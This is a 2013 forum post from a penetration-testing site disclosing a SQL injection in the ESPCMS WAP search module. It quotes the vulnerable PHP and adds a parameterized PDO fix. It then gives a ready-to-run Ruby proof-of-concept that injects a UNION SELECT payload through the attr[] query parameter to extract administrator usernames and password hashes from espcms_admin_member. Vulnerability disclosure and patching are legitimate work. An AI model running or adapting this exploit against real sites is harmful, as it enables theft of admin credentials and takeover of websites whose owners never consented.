China Network Penetration Testing Alliance (中国网络渗透测试联盟)
Title: espcms WAP module search SQL injection
Author: admin
Time: 2013-7-27 18:31
0x0 Vulnerability overview
0x1 Vulnerability details
0x2 PoC
0x0 Vulnerability overview

ESPCMS (易思ESPCMS企业网站管理系统) is an enterprise website management system built on LAMP. It is simple to operate, powerful, stable, extensible and secure, and easy to customize and maintain, so it can help you build a powerful, professional corporate website quickly and easily.

Insufficient care when handling incoming parameters leads to SQL injection.
0x1 Vulnerability details

The variable flows through $_SERVER['QUERY_STRING'] -> $urlcode -> $output -> $value -> $db_where -> $sql -> mysql_query, with no filtering anywhere along the way, which is what allows the injection.

Because the variable is read from $_SERVER['QUERY_STRING'] rather than from $_GET, it bypasses the program's own input filtering.

Moreover, the injected variable is an array value, not an array key, so it is not filtered either; together this produces a rather unusual SQL injection.

In the in_result function of /interface/3gwap_search.php:
```php
function in_result() {
    // ...
    // The raw query string is parsed directly, bypassing the filtering applied to $_GET.
    $urlcode = $_SERVER['QUERY_STRING'];
    parse_str(html_entity_decode($urlcode), $output);
    // ...
    if (is_array($output['attr']) && count($output['attr']) > 0) {
        $db_table = db_prefix . 'model_att';
        foreach ($output['attr'] as $key => $value) {
            if ($value) {
                // Only the array key is escaped and trimmed.
                $key = addslashes($key);
                $key = $this->fun->inputcodetrim($key);
                $db_att_where = " WHERE isclass=1 AND attrname='$key'";
                $countnum = $this->db_numrows($db_table, $db_att_where);
                if ($countnum > 0) {
                    // The array value is concatenated into the WHERE clause without any escaping.
                    $db_where .= ' AND b.' . $key . '=\'' . $value . '\'';
                }
            }
        }
    }
    if (!empty($keyword) && empty($keyname)) {
        $keyname = 'title';
        $db_where .= " AND a.title like '%$keyword%'";
    } elseif (!empty($keyword) && !empty($keyname)) {
        $db_where .= " AND $keyname like '%$keyword%'";
    }
    $pagemax = 15;
    $pagesylte = 1;
    if ($countnum > 0) {
        $numpage = ceil($countnum / $pagemax);
    } else {
        $numpage = 1;
    }
    // $db_where, and with it the unescaped $value, ends up in the query that is executed.
    $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
    $this->htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON['file_fileex'], 5, $this->lng['pagebotton'], $this->lng['gopageurl'], 0);
    $sql = $this->htmlpage->PageSQL('a.did', 'down');
    $rs = $this->db->query($sql);
    // ...
}
```
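A hardened replacement for the attr[] loop above, added here as an example; it is not ESPCMS code. It assumes a PDO connection $pdo (swapped in for the page's $this->db so that values can be bound as parameters), the db_prefix constant used by the page's code, and PHP 7.1+ for array destructuring; the 'WHERE 1=1' placeholder stands in for the conditions the page elides with "...".

```php
<?php
// Added example, not ESPCMS code: hardened version of the attr[] handling in in_result().
// Assumptions: $pdo is a PDO connection (swapped in for $this->db), db_prefix is the
// table-prefix constant the page's code also uses.

/**
 * Turns the attr[] array (taken from parse_str() on $_SERVER['QUERY_STRING'], exactly as in
 * the vulnerable code) into a WHERE fragment that uses placeholders instead of concatenation.
 * Returns [$sqlFragment, $boundValues].
 */
function build_attr_where(PDO $pdo, array $attr): array
{
    $where  = '';
    $params = [];
    // The attribute-name lookup is parameterized as well, instead of interpolating $key.
    $check = $pdo->prepare('SELECT COUNT(*) FROM ' . db_prefix . 'model_att WHERE isclass=1 AND attrname=?');

    foreach ($attr as $key => $value) {
        // Accept only scalar values and keys that look like a plain column identifier.
        if (!is_string($value) || $value === '' || !preg_match('/^[A-Za-z_][A-Za-z0-9_]{0,63}$/', (string) $key)) {
            continue;
        }
        $check->execute([$key]);
        if ((int) $check->fetchColumn() === 0) {
            continue; // unknown attribute name: skipped, as the original does
        }
        // $key is a validated identifier that exists in model_att, so it may be used as a column
        // name; $value never becomes part of the SQL text, so quotes or keywords in it stay data.
        $where    .= ' AND b.`' . $key . '`=?';
        $params[]  = $value;
    }
    return [$where, $params];
}

// Usage mirroring the original flow. 'WHERE 1=1' is a placeholder for the conditions the page
// elides with "..." that precede the attr[] loop in $db_where.
parse_str(html_entity_decode($_SERVER['QUERY_STRING']), $output);
$attr = (isset($output['attr']) && is_array($output['attr'])) ? $output['attr'] : [];
[$attrWhere, $attrParams] = build_attr_where($pdo, $attr);

$sql = 'SELECT b.*,a.* FROM ' . db_prefix . 'document AS a LEFT JOIN ' . db_prefix
     . 'document_attr AS b ON a.did=b.did WHERE 1=1' . $attrWhere . ' LIMIT 0,15';
$stmt = $pdo->prepare($sql);
$stmt->execute($attrParams);
$rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
```

The same binding approach applies to the $keyword branch that follows the loop; $keyname, like $key here, must be validated as an identifier rather than bound, since placeholders cannot stand in for column names.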
0x2 PoC

```ruby
require "net/http"

def request(method, url)
  if method.eql?("get")
    uri = URI.parse(url)
    http = Net::HTTP.new(uri.host, uri.port)
    response = http.request(Net::HTTP::Get.new(uri.request_uri))
    return response
  end
end

doc = <<HERE
-------------------------------------------------------
Espcms Injection Exploit
Author:ztz
Blog: http://ztz.fuzzexp.org/
-------------------------------------------------------
HERE

usage = <<HERE
Usage: ruby #{$0} host port path
example: ruby #{$0} www.target.com 80 /
HERE

puts doc
if ARGV.length < 3
  puts usage
else
  $host = ARGV[0]
  $port = ARGV[1]
  $path = ARGV[2]
  puts "\nsend request..."
  # The injected value is the attr[] array value, which reaches $db_where unescaped.
  url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&" \
        "attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13" \
        ",14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27" \
        ",28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
  response = request("get", url)
  result = response.body.scan(/\w+&\w{32}/)
  puts result
end
```
Welcome to China Network Penetration Testing Alliance (https://cobjon.com/)